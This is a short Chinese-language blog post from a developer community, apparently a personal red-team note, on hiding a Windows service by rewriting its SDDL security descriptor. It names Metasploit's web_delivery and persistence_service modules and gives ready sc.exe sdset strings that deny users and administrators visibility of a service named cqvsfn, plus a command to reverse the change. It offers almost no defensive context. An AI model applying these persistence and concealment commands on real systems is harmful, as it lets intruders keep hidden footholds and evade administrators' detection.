前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >隐藏服务-sddl

隐藏服务-sddl

原创
作者头像
浪子云
修改2022-09-30 17:58:50
4310
修改2022-09-30 17:58:50
举报
文章被收录于专栏:子云笔记子云笔记
代码语言:javascript
复制

use exploit/multi/script/web_delivery 
use exploit/windows/local/persistence_service
cmd:
sc query cqvsfn
sc qc cqvsfn
powershell:
get-service -name cqvsfn

Joshua Wright提供的方法使用sc 命令的sdset模块可以修改服务的安全描述符:
SDDL隐藏
cmd:(隐藏服务)
sc.exe sdset cqvsfn "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

powershell:(取消隐藏)
& $env:SystemRoot\System32\sc.exe sdset cqvsfn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档